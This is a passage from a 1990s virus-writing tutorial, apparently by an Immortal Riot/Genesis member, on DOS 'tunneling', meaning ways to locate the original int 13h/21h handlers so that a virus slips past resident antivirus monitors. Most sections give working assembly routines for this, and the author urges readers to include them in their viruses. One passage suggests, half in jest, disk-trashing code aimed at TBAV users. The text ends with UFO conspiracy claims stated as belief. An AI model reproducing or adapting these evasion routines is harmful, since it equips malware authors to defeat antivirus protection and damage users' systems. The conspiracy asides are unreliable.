is probably the worst possible way to tunnel :)  Since it was utilized in the
80's, a time when AV manufacturers had time to actually dissassemble and
understand each and every single (rare) virus they were given, the AV people
already know this trick, and a few trap this call in their TSR modules and
return the address to their own i13 handler code (TBDRIVER is one example, more
about it in the next section).  If it wasn't for the vulnerability to AV
software, this method would be practically guaranteed to work as it is a
documented function of DOS.

-----------------------------------------------------------------------------
Section 4:  DOS kernel scanning for i13
-----------------------------------------------------------------------------
    Since the very beginning of DOS, segment 70H has been used for all of its
disk processing functions.  Luckily for us, the original BIOS address of i13 is
stored at 70:B4... however, if we were to just use the value at this address,
we could run into problems in new and old DOS versions which may change the
location.  So, by scanning through segment 70h for a CALL DWORD PTR [00B4]...
if we find one, then we know the value at 70:B4 is valid for usage.  The author
of 'Creeping Death' was the first that I know of to utilize this method.  Time
for a pre-coded example.

    .---------.
    | Example |
    '---------'
kernel_13 proc near
    mov ax,70h
    mov ds,ax
    mov si, 1
kernel_13_loop:
    cmp si, 0
    je kernel_13_abort      ; exit when we've finished total scan

    dec si
    lodsw                   ; get data from DS:SI

    cmp ax,1effh            ; is it the CALL FAR [X]?
    jne kernel_13_loop      ; nope, keep scanning

    cmp word ptr ds:[si],0b4h
    jne kernel_13_loop

    mov si, 0b4h
    push ds:[si]
    pop cs:[orig_13]
    push ds:[si+2]
    pop cs:[orig_13+2]
    clc
    ret
kernel_13_abort:
    mov cs:[orig_13], 0
    mov cs:[orig_13+2], 0
    stc
    ret
kernel_13 endp

    .----------.
    | Problems |
    '----------'
    This routine has also been around for a long time, just like the last i13
grabbing method... however, no AV program I know of traps it.  Trapping such a
routine is -VERY- easy... simply check that 70:B4 is valid for yourself, then
switch the value there with the address of your own own i13 handling code,
which means that all i13 access will be redirected to your handler where you
can check for writes to track 0, etc.  You yourself could, however, bypass this
by making sure the segment of the address at 70:B4 is F000 (BIOS segment) or
C800 (old XT DISK BIOS segment) before using it (which TBDRIVER stops... read
the info below this).  To make all these attempts futile, the AV can replace
the CALL FAR with an INT xx which calls their own i13 handling code, which then
gives control over to the address stored in 70:B4 once all the tests for
virus-like behaviour have been done.

    .-----------------.
    | How good is it? |
    '-----------------'
    Strangely enough, TBDRIVER points the value at 70:B4 to its own code...
however in effect, this code is null, simply passing control to the proper
original handler.  Sigh, I think its there so if you test the address at 70:B4
for the BIOS i13 handler segment... the test will fail and you will think the
address is invalid... when in reality it is perfectly valid.  Oh well.  Apart
from that... which is basically no problem at all, this routine should work a
majority of the time.

-----------------------------------------------------------------------------
Section 5:  DOS terminate backdoor
-----------------------------------------------------------------------------
    This is one of the most obscure of tunneling methods I have been told of to
date, and I haven't seen any viruses which use it specifically.  Not many
people seem to know about it, probably because it is the least efficient of all
the methods presented so far ;)

    .-------------.
    | What is it? |
    '-------------'
    You may remember old faithfull interrupt 20, DOS's now obselete function
for program termination.  Well, due to the way DOS is set up, sometimes the
address of i20 can help us track down the original DOS kernel entrypoint to the
i21 handler.

    When DOS is loaded into low memory on bootup, i20 points to the DOS code
segment, and not many programs hook into i20, and definately no normal run of
the mill TSR's will hook into it, so generally speaking, i20 is always pointing
to the DOS code segment, which means we could do kernel scanning for the
CLI/CMP pair.

    But wait, what if DOS is loaded high?  Well that is even better for us,
because the i20 points to a FAR JMP, followed by another FAR JMP, and (at least
on my system), is followed by an IRET, with the second FAR JMP being a direct
JMP to the i21 entrypoint!  So, in memory, things will look like this.

    i20_entrypoint:
        JMP FAR xxxx:xxxx       ; jumps a few bytes below i21 entrypoint
        JMP FAR xxxx:xxxx       ; jumps directly to i21 entrypoint
        IRET

    Alternatively, you can tunnel i20 itself and scan for the i21 CLI/CMP pair,
however you'd have to do this with code tracing, rather than emulation or
single stepping, because executing i20 will terminate the currently running
program or, alternatively, just bugger things up.

    The biggest problem with tunneling with this method... is working out
wether DOS is loaded high or low... because if you think it is loaded low, but
i20 has really been hooked by another program, then searching for the CLI/CMP
pair could cause you to misfire badly.  On my system, i20 always points to
below the first MCB, wether DOS is high or low, so my example routine assumes
if this is not the case, then i20 has been hooked.  Things may be different on
other people's systems however, so you may want to check around your own i20.

    .---------------.
    | Example time! |
    '---------------'
i20_exploit proc near
    mov ax, 3520h
    int 21h
    mov ax, es
    mov ds, ax
    mov si, bx              ; point DS:SI to i20
    cmp ax, cs:[first_mcb]
    jae i20_hooked
i20_high:
    cmp byte ptr ds:[si], 0eah
    jne i20_low             ; check for first JMP FAR
    add si, 5
    cmp byte ptr ds:[si+5], 0cfh
                            ; check for IRET (maybe this should be left out)
    jne i20_hooked
    cmp byte ptr ds:[si], 0eah
                            ; check for second JMP FAR
    jne i20_hooked
    inc si
    lds si, ds:[si]
    mov cs:[orig_21], si
    mov cs:[orig_21+2], ds
    clc
    ret
i20_hooked:
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    stc
    ret
i20_low:
    push ds
    pop es
    mov cx, -1
    std                         ; scan backwards
    xor di, di                  ; bleh :)
    mov al, 0fah                ; 'CLI'

i20_scan_loop:
    scasb
    je i20_scan_okay            ; exit if CLI found
    loop i20_scan_loop          ; keep scanning
i20_scan_error:
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    stc
    ret                         ; exit if no CLI found
i20_scan_okay:
    cmp word ptr es:[di+2], 0FC80h
    jne i20_scan_loop
    inc di                      ; SCASB fixup
    mov cs:[orig_21], di
    mov cs:[orig_21+2], es      ; save CLI's CS:IP (ES:DI)
    clc
    ret                         ; exit happily
i20_exploit endp

    .----------------------.
    | Bzzt!  Lie detected! |
    '----------------------'
    Okay okay, so I lied earlier on when I said not many programs hook i20.
Well, it was actually a half-truth.  Not many programs DO hook i20, however, a
few very major programs DO hook it :)  DESQView and Windows definately hook it,
and generally, any shell program or multitasking program would hook into it.
Anything which needs to control programs might hook it, so this includes
viruses, which sometimes use i20 in tricky ways to go resident past AV tsr
software :)  However, generally, these viruses restore i20 to its proper value
once their work has been done, which means unless the program your tunneler is
executing from has a copy of a virus which isn't resident, but is using i20
techniques to go resident, the chances of conflicting are minimal.

    .---------------------.
    | But is it reliable? |
    '---------------------'
    Not many VX people know about this technique, let alone AV people!  I have
never seen this technique in a virus, so I doubt very much that any AV out
there traps it.  Even if they do, they'll have to fool your specific way of
checking if it is a real DOS i20 or if it has been hooked, and they'd have to
emulate the code signatures you check for, etc, etc.

    So, although it is reliable from a standpoint of not being detectable by AV
software, it is not very reliable speaking from a 'per-system success rate'
point of view... since alot of people run DESQView/Windows/etc.  However, if
the pointers for i20 ARE correct, then you've got a good routine to find i21!
So, you may want to include these routines in your virus anyway, along with
another i21 tunneling method as a backup in case this one fails.

-----------------------------------------------------------------------------
Section 6:  CP/M utilization
-----------------------------------------------------------------------------
    There was an extensive document written about this tunneling method in
VLAD#3, so if you don't understand my version of how to utilize this backdoor,
then feel free to go fuck yourse... I mean, uuuh, go read the other version :)

    .-------.
    | CP/M? |
    '-------'
    Back in the days before DOS, the predominant operating system of the time
was CP/M.  When Bill Gates created DOS 1.0 for marketing on the IBM PC, he
wanted to make DOS look attractive to buyers by making it easy for people to
port their CP/M code into his DOS operating system, and since DOS is very
backwards-compatable, through the many upgrades of DOS there are still a few
(now, totally obselete) functions still retained from the CP/M compatable bits,
namely, the CP/M function dispatcher.

    The code for this dispatcher is stored very close to the handler for i21,
inside the kernel, because the CP/M handler actually uses the i21 handler to do
its dirty work (it converts its calls into i21 calls).  Anyway, if we can
tunnel into the CP/M handler, using either code tracing or single step mode, or
even possibly if the CP/M handler hasn't been modified and still points to the
DOS kernel, we can try to deduce the i21 beginning.

    Anyway, because of the wierd way CP/M operates, there is no real interrupt
to call for its routines, there are only entrypoints, of which there are two,
stored in different places.  First, there is the data at i30, which is a JMP
FAR off:seg, and the data in the PSP at offset 5, which is a CALL FAR off:seg.

    Unfortunately for us, some AV programs would purposely corrupt the i30
entry, which is created on bootup by DOS, and apart from this, thanks to DOS
and DESQView, the entry in the PSP is usually corrupted!  In some DOS versions,
it points to the correct address, in some it points 2 bytes too low, and under
DESQView, it points (from the version I have) 12 bytes too low.  Anyway, using
either entry is too much hassle, because of corruption, so, what can you do?

    The answer is simple, there is only one true entry you can rely upon, and
that is stored somewhere in memory in the PSP of the original shell (usually
COMMAND.COM) itself.  How do we find this?  At offset 16h in the current PSP,
is the segment address of the PSP of the calling program.  Every (valid) chain
of PSP's eventually leads to COMMAND.COM or whatever processor the user is
using, and from there you can get the real CP/M entrypoint, from the shell's
PSP.

    .--------------.
    | Marker bytes |
    '--------------'
    There are two sets of marker bytes that can be at the original kernel i21
entrypoint.  When raw DOS or QEMM is loaded, the marker is 'FA80', with the
'1E1E' marker of the CP/M code 025h bytes below this position.  When EMM386 is
loaded, the kernel i21 handler precedes the CP/M handler by 032h bytes, with
both having the marker of '9090, E8'.

    Generally, PSP tracers go through and check for the CP/M marker bytes, and
then guess at the correct location of i21 from there... which generally works
under DOS/QEMM/HIMEM.SYS.  However, when you loadup DESQView or Windows, they
replace the DOS CP/M call with their own code, which then chains onto their own
i21 handlers, which later chain onto the DOS i21 handlers... causing the former
marker bytes to become invalid.

    However, no matter what, in the end everything is translated down to the
DOS kernel i21 calls, so, if you check for the i21 entrypoint marker bytes, and
-THEN- check for CP/M bytes in their proper position, then you will work under
DOS/QEMM/HIMEM/WINDOWS/DESQVIEW software and this is a good thing[tm].  BUT,
even then there are PROBLEMS!  ARGH!  The pure DOS version of the CP/M handler
doesn't chain directly onto the i21 handler... it chains a few bytes AFTER the
CLI/CMP AH, XX/etc, directly to a CMP/JE instruction.  Of course you -COULD-
check for this, but it would require alot of messing about to make sure you are
right in all circumstances.

    However, to do that, you need to have a stable method of tracing through
all the junk code that programs like DESQView/Windows use for their interrupt
handlers, and as of now, you don't have that technology.  Why?  Because code
tracing is the only method you know of so far, and it is in no way stable
enough to trace through something like DESQView (trust me, I tried).  Emulation
could possibly be an alternative, but you don't know about emulation technology
yet :)

    So what are your choices?  Well, you have two.  Because of the way the DOS
CP/M handler is set up, there SHOULD be a chain of JMP FAR off:seg instructions
from the CP/M entrypoint you get, to the real entrypoint near the DOS i21
kernel.  If the CP/M chain has been tapped into however, there will be no
chain, or it will lead somewhere else where there won't be the correct marker
signature bytes that you'll be scanning for.

    Alternatively, you could use single stepping.  Now, this is not such a bad
idea, at least, at first glance.  However, there are a few things you have to
be very very carefull of if you chose this technique that I'll tell you about
later.  If you -DO- use this technique, then you need to know how to use the
CP/M entrypoint you got from COMMAND.COM's entrypoint.

    To execute a CP/M call is fairly tricky.  Only DOS i21 functions below 024h
can be ran, and instead of being in AH they are in CL.  Also, CP/M calls always
corrupt AX, and possibly a few other registers.  Anyway, to do a CP/M call, you
push your return IP onto the stack, followed by your return CS, followed by the
flags (yes, the stack is backwards, ip, cs, flags), and then jump to the CP/M
entrypoint.  So, simply do your single step mode routines as usual, and checl
for the proper markers along the way.

    .--------------.
    | Example code |
    '--------------'
    This example uses a quick method of climbing up the PSP chain to get to the
command shell's PSP, and then getting the CP/M entrypoint from there.  After
this, it follows any FAR JMP's as far as possible, but once the FAR JMP's have
stopped, it immediately checks for the magic marker bytes, meaning this
technique will not work under DESQView or anything else which hooks into the
CP/M chain of command.

;; on entry, make sure DS==PSP address
; returns DS:SI as i21 address
; carry clear on success, carry set on failure
;
tunnel_cpm proc near
    mov ax, ds:[016h]
    mov bx, ds
    cmp ax, bx
    je psp_end
    cmp ax, 0
    je psp_end
    mov ds, ax
    jmp tunnel_cpm

psp_end:
    mov si, 5

jump_loop:
    lds si, ds:[si+1]
    cmp byte ptr ds:[si], 0eah
    je jump_loop

check_first_magic:
    cmp word ptr ds:[si], 9090h
    jne check_second_magic
    sub si, 32h
    cmp word ptr ds:[si], 9090h
    jne tunnel_error

tunnel_success:
    clc
    ret

check_second_magic:
    cmp word ptr ds:[si], 2e1eh
    jne tunnel_error
    add si, 25h
    cmp word ptr ds:[si], 80fah
    je tunnel_success

tunnel_error:
    stc
    ret
tunnel_cpm endp

    .--------------.
    | Aaaaaaaaargh |
    '--------------'
    That will be your reponse when you run this code under TBAV :)  TBAV (7.06
at least, but probably long before that as well) is very mean when it comes to
CP/M calls, replacing not only the i40 and PSP values with junk (although not
COMMAND.COM's), but OVERWRITING the ORIGINAL entry to the CP/M calls with an
i20!  Need I even mention the incompatability horrors that this has and will
create for old programs, CP/M emulators, etc?  TBAV doesn't even give you an
error message, it just brutally quits the running program.  How naughty.

    This is why I advised against using single step tunnelers to do your dirty
work :)  You -COULD- simply check for an 'int 20' in your single step handling
code... sure... that would be easy.  As far as I know, tunneling the CP/M
handlers with single step mode is very reliable as long as you check for the
i20.  However, remember, TBAV might like to change the i20 one day into a
AH=4C/INT 21 :)

    Should TBAV CP/M killer code be encountered, you may like to tunnel another
interrupt, say, oh, I don't know, i13 maybe, trashing the hard disk, and giving
the user an error message from DOS, complaining about bad CP/M dispatch
handlers, and finally, of course, giving you the names of the bad program which
is responsible, TBDRIVER.EXE, and asking you to ring the 'product developer'
for more information.  ROFL.  I can just imagine some poor loser ringing up
thunderbyte support and saying that his hard disk has dissapeared while he was
running TBAV... and that there was some error about bad CP/M handlers.... :)

    Normally I don't condone disk-trashing code... but BLATANT disregard for
software compatability such as that shown by thunderbyte is just unacceptable
in my books.  Just stopping a program dead in its tracks... how brutal.

    Programs have rights too you know

    .--------------.
    | Reliability? |
    '--------------'
    Yes, this routine is very reliable.  Well, once again, it really depends on
what we're talking about... sure, this routine, if it works, is VERY reliable,
and it is very unlikely your routine will be caught out by resident AV
software, as for how successfull it is in the real world, I'd think probably
about as reliable as the i20 trick.  Basically, it will definately NOT hurt
your virus including a routine such as this.

-----------------------------------------------------------------------------
Section 7:  Uuuuuh, SFT tunneler?
-----------------------------------------------------------------------------
    Okay, so, I don't exactly understand WHY this routine works, but, well, it
does, shrug.  It was allegedly created by the STEALTH group, and included in a
virus called Killer, which was printed in VLAD#7.

    .----------.
    | The code |
    '----------'
stealth proc near
    cld
    mov ah, 52h
    int 21h             ; get DOS list-of-lists
    lds si, es:[bx+4]   ; DS:SI = DOS SFT tables
    lds si, ds:[si-4]   ; DS:SI = somewhere in the DOS code segment?
stealth_loop:
    dec si
    cmp word ptr ds:[si], 0e18ah
    jne stealth_loop    ; MOV AH, CL
    cmp byte ptr ds:[si+2], 0ebh
    jne stealth_loop    ; JMP SHORT
stealth_calculate:
    lodsb
    cmp al, 0fah
    jne stealth_calculate   ; search for DOS kernel entrypoint CLI
    dec si
    mov cs:[orig_21], si
    mov cs:[orig_21+2], ds
    ret                     ; save addresses and exit
stealth endp

    .------.
    | Huh? |
    '------'
    Yeah, that was my response too.  I seem to have most of it worked out
however.  What it does, is somehow find the DOS code segment, the address of
which is stored at the dword below the beginning of the SFT tables... and then
it begins scanning for the CP/M handler in the kernel, before advancing a few
more bytes to find the i21 handler address.  The reason they search for the
CP/M handler instead of straight out looking for the i21 entrypoint is because
searching for both is more reliable... if you want to change the routine to
search for the i21 entrypoint straight away, you'll have to use a long match
string (4-6 bytes) so that you don't get it confused with all the other junk in
the DOS code segment.

    What perplexes me is what the hell the address of the original DOS code
segment is doing just below the SFT tables.  Apart from that, the rest of the
routine is easily understood.

    .---------------------.
    | How reliable is it? |
    '---------------------'
    To be quite honest, I have no idea :)  It seems to work constantly on my
system, even under DESQView and DOSDATA.SYS (a rare change).  If I only knew
what the address pointed to just below the SFT tables was, maybe I could
comment more on its reliability.  HOWEVER, since this routine uses a modified
kernel scanner, it does have the problems associated with kernel scanners,
which are discussed later on in the document.  STEALTH says that this routine
should work on DOS versions 3-7 (Win95)... however they didn't take into
account the problems with kernel scanning.

-----------------------------------------------------------------------------
Section 8:  Double-NOP scanning
-----------------------------------------------------------------------------
    Hehe, sorry, I had to include the weirdest type of tunneler I could find
into this document :)  Hey, sue me.  I've seen this code in the SterCor virus
by Yosha, and the Diametric/Matricide virus by Rajaat [IR/G].  They were coded
differently but used the same principle to do the tunnel.  After having a close
look at both codes, they look coded differently enough to warrant my conclusion
that they both created the idea independently.  In the time-line however, I
suspect that Rajaat may have created the routine before Yosha, however Yosha's
was released to the public before Rajaat's... however I saw Rajaat's even
before Yosha's was released!  Sigh.  Who cares anyway?

    .--------------------.
    | How Raajat's works |
    '--------------------'
    Rajaat's works by finding the DOS data segment (which is contained usually
in the DOS code segment) and scanning through for the double-NOP signature of
the i21 patch entrypoint.  Each double-NOP is followed by a JMP CS:[DWORD MEM]
instruction, and he checks the address pointed to by the JMP for the CLI/CMP
i21 kernel entrypoint.

    .-------------------.
    | How Yosha's works |
    '-------------------'
    Yosha's also finds the DOS data segment (with a different function call)
and scans through that segment for the first JMP CS:[DWORD MEM] instruction.
Then, it calculates the address of the 2nd JMP CS:[DWORD MEM] after that one,
and uses the address pointed to by it, to check for the i21 CLI entrypoint
marker.

    .------------------.
    | Which is better? |
    '------------------'
    Well, this is pretty hard to work out actually ;)  Rajaat's is more secure,
as it doesn't depend on a fixed constant like Yoshas.  HOWEVER, in actuality,
the 3rd JMP CS:[DWORD MEM] will always (as far as I know) point to the i21
handler... which means Rajaat's method is slightly redundant :) Although this
is the case, redundant code impresses me, so Rajaat wins out ;)

    .---------.
    | Example |
    '---------'
rtfm proc near
    mov ax, 4300h
    int 2fh
    cmp al, 80h
    jne rtfm_error          ; abort if no memory manager

    mov ah, 52
    int 21h                 ; ES == DOS data segment

    push es
    pop ds
    xor si, si
    cld

rtfm_loop:
    lodsw
    cmp si, -1
    je rtfm_error           ; abort if entire segment scanned with no result
    dec si
    cmp ax, 9090h
    jne rtfm_loop           ; reloop if no double-NOP signature

    cmp word ptr ds:[si+4], 0ff2eh
    jne rtfm_loop           ; no JMP FAR CS: there

    cmp byte ptr ds:[si+6], 2eh
    jne rtfm_loop           ; no JMP FAR CS: there

    mov bx, ds:[si+7]
    les di, ds:[bx]

    cmp byte ptr es:[di], 0fah
    jne rtfm_loop           ; no CLI at entrypoint

    mov cs:[orig_21], di
    mov cs:[orig_21+2], es
    clc
    ret                     ; save address and exit

rtfm_error:
    mov cs:[orig_21], 0
    mov cs:[orig_21+2], 0
    stc
    ret                     ; clear address and exit
rtfm endp

    .---------------.
    | How reliable? |
    '---------------'
    Well, it's not very reliable, for numerous reasons.  Sigh, neither will
work under Windows, and neither will work if a memory manager isn't loaded
(Rajaat's checks for a memory manager, Yosha's doesn't).  Also, neither will
work under QEMM if DOSDATA.SYS is being used to free up conventional memory,
because DOSDATA.SYS relocates the DOS data segment into upper memory, far far
away from the DOS code segment, meaning none of the double-NOP or JMP FAR
pointers will be found.  Both, being kernel scanners, also have the problems
associated with kernel scanners which are discussed in the next section.

    If it wasn't for those problems with kernel scanners, and -IF- DOSDATA.SYS
was not being used, the routines would be secure.  The good thing is, neither
has much chance of returning you a wrong value, so including a tunneler such as
these in your viruses wouldn't hurt, as long as you included a few backup
tunnelers in case these fail.

-----------------------------------------------------------------------------
Section 9:  Other tidbits
-----------------------------------------------------------------------------
    There were a few mini-tidbits of information left to tell you, which were
too small to fit into normal sections, and also a few notes about things I said
in previous documents which proved untrue, etc, etc... you could call them
woopsies :)  Anyway, here they are :)

    .-----------------.
    | Kernel scanning |
    '-----------------'
    Okay, now you know most of the different routines so far... but many of
them have something in common... scanning for the dos kernel entrypoint through
a certain segment.  This is the fundamental basis of most of the techniques
you've seen so far.  Most of them are simply trying to track down the DOS code
segment so they can begin scanning.

    You might be asking yourself how you're supposed to scan :)  It's just a
term used to describe checking through the whole segment for a set of hex bytes
which indicate the entrypoint of the i21 handler.  For instance, usually, they
are CLI/CMP AH, 6C/JA XX... or, alternatively, NOP/NOP/CALL XX/JMP FAR [XX].
The problem with the second signature, is that the area surrounding it is FULL
of ones exactly like it... however you can tell which one is the real one,
because it is the 3rd set of double-nop's.

    .-------------------------------.
    | Problems with kernel scanning |
    '-------------------------------'
    Kernel scanning relies on a certain signature to find the DOS entrypoint.
Obviously, DOS versions change, and since normal programs SHOULDN'T be relying
on certain DOS code to stay constant... Microsoft couldn't really be blamed for
totally rewriting their interrupt handlers and making all old signatures
absolutely useless.  Hell, they could totally rewrite DOS into a protected mode
version for all I know.  Anyway, there are quite a few different DOS types out
there, DR-DOS, Novell DOS, etc, and you could never be sure all will use the
same signature as Microsoft DOS.  However, those are only possibilities, the
truth of it is, that there is probably never going to be a new DOS version, and
that the other types of DOS do use practically the same signatures as the
Microsoft version.

    However, there are more problems.  Some viruses, anti-viruses, and network
software, hook into i21 by overwriting the initial entrypoint with a FAR JMP,
FAR CALL, or INT to their own code... and once they are finished, they put the
proper code back in the i21 handler, and once the i21 handler has finished,
replace the original entrypoint code with their own again.  Novell Netware for
DOS does this... and I would think that ALOT of people run Novell.  Not many AV
programs use this method... however quite a few viruses do these days, to
prevent detection from resident-AV programs which warn the user when a program
hooks an interrupt such as i21.

    By picking the right signatures though, ones which aren't right at the
entrypoint and therefore vulnerable to being overwritten, but closeby and not
likely to change between the versions of DOS... you could still get away with
kernel scanning.

    .--------------------------.
    | i40 and BIOS entrypoints |
    '--------------------------'
    i40 is actually the original BIOS i13 floppy disk handler... which is
redirected to the i40 address -IF- and -ONLY IF- a hard disk is present on the
system.  You can use i40 just like i13, except it won't accept hard disk
numbers as paramaters.  Make sure you check the i40 address before you use it
though, as if there is no hard disk on the system then it will point into
nothingness.  Oh, and in some BIOS's, the original i13 handler is at F000:EC59,
however I wouldn't depend on this too much, considering the number of different
BIOS's out there.  Mine points there though...

    Another unreliable way of finding the original i13 address in the BIOS is
to scan through it for the starter bytes of an i13.  Many BIOS's differ,
however, generally speaking, they start with a CMP DL, 80... or a TEST DL, 80
followed shortly after by an INT 40.  This would not be hard to make a scanner
for... however I cannot vouch as to ones reliability or how succesfull one
would be.

    It would be alot safer to simply use a good code tracer/emulator to go
through the i13 code until it hits segments F000h or C800, where the AT+ and XT
i13 entrypoints respectively reside.

    .-------------------------------.
    | QEMM plays "Romeo and Juliet" |
    '-------------------------------'
    Catchy heading huh?  Well, basically, when you have QEMM and DOSDATA.SYS on
a system, sometimes they actually work together properly and free up basically
all of your lower memory... even memory lower than segment 300.  If you think
that number sounds familiar, then good... if it DOESN'T sound familiar, you've
obviously totally forgotten about tunneling document #1, where I told you how
to locate the original i21 handler.

    Basically, the easiest way in single stepping to locate i21 was to locate
the first DOS MCB and if, in your int 1 routine, your CS hits a value equal to
or below this value, then you are in the DOS kernel.  I had also said that
generally the DOS CS is below 300h, so you could use that as a check (if CS <
300h, then CS==DOS CS).  Now, I have learnt that I was wrong, so you have to go
back to using the find-first MCB method.

    Oh, and you're probably wondering what the f**k all this has to do with
Romeo and Juliet.  It's obvious isn't it?  "Where for art thou i21?"  <Reader
goes silent, staring at wall, eyes glaze over>  Yeah yeah, hopeless.

-----------------------------------------------------------------------------
Section 10:  Conclusion
-----------------------------------------------------------------------------
    Once again there proves to be life beyond single stepping and code tracing,
and now you have a MULTITUDE of virtually unstoppable routines with which to
tunnel.  Most of them are small and reliable... and there's no reason not to
include at least one or two in your next virus... unless you want to look
demented when your full stealth polymorphic tsr com/exe/sys infector is caught
by TBAV when infecting files...

    .------------------------------------------------------------------.
    | PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG |
    '------------------------------------------------------------------'
    Yes that's right!  Time for a plug!  Tunneling document #4 will be out soon
(I'm already working on it!), and do you know what it's about?  FULL CODE
EMULATION.  That's right!  I've been writing these code emulation babies (yes,
TWO of them) for the aliens, and let me tell you, they rock the ass off of
anything you've -EVER- -EVER- seen.  And they are ready to be presented in
document #4!!!  The last and final and definitive document on tunneling you
will -EVER- need in your entire coding life.

    Not only can they be used to tunnel interrupts, they can be used to run
software under your own control (provided that software doesn't use protected
mode, of course, sheeit, I aint gunna emulate that).  This means they can ALSO
be used in your own AV software to decrypt even the most COMPLEX forms of
polymorphism which aren't even out yet!!!!!!!!!  If that's not enough, they can
be used to infect files not at the beginning, not at the end, but RIGHT IN THE
GODDAM MIDDLE!  YEHAH!  (you'll see a document about mid-file infection out by
me some time in the future).  They slice!  They dice!  They emulate!  Goddamit,
they do EVERYTHING!!!

     So, what are you waiting for?  Start asking for document #4 today!

    .----------------.
    | PLUG MODE: OFF |
    '----------------'

    Sigh, back to normal.

    On the topic of normal, you'll find a nice juicy example program along with
this document, just like you did with the other two, containing examples of all
the methods presented so far in here and giving you results of where each
method thinks i21/i13 are.  You'll most likely get alot of wrong guesses, but
thems the breaks.  Alot of these routines aren't exactly what I'd call 100%
reliable.  Well, not even 80% reliable :)

    Oh, and now you want to have your status level increased do you?  Well, I
suppose that since you learnt alot about the insides of DOS in this session,
you might be ready to be given the title of extraterrestrially intelligent
tunneler.  There you go, don't you feel so much better?

    Speaking about aliens... did you know the US government is secretly using
crashed UFO technology to create their own 'primitive' and yet highly advanced
UFO fleet, to protect US citizens if the 'grays' (aliens) go back on their
peace treaty and try to invade Earth (the treaty went along the lines of "you
give us some of your weaponry, and we'll cover up your existence and let you
take people late at night from their homes to run tests and shit").  At least,
that's what some people (like me) think.

    Not only that, I'm sure you'll be glad to know the US military is building
weapons which utilize INTENSE electromagnetic fields, which can blow a UFO out
of space from the ground.  Yes, you heard me, right, they could blow their own
astronaughts up if they wanted to... a scary thought should a space shuttle be
'misidentified'.  Of course, I don't think the systems are automated yet so we
are only prone to human error (may God have mercy on our souls, hehe).

    Anyway, you are now a gray.  How does it feel?  Aren't you just loving that
intense alien energy flowing through your now highly intelligent body?  Feel
like going out late at night, stealing people from their beds and carrying out
biological tests on them, returning them a few hours later to have nose bleeds
from the metal tracking devices you've inserted into their noses?  If so, then
check yourself into the nearest looney bin, heh, you're only as smart as a
tunneling alien... NOT AN ACTUAL ALIEN.  Or.......... are you?!???!! :)

    I really hope you enjoyed this document... it was actually quite hard to
write compared to the others... simply because it's hard to tie 8 totally
unrelated methods into one document... and the new CMT 2.0 standard took a bit
of thinking to get working.  It's strange to see how little people out there
really know about mini tunneling routines... the ones here were damn hard to
come by.  So, until you become a tunneling god in document #4 (you really
should get it, it is going to be the -BEST-)... sigh, dont get abducted by
aliens now, you hear?

                                        Methyl [Immortal Riot/Genesis]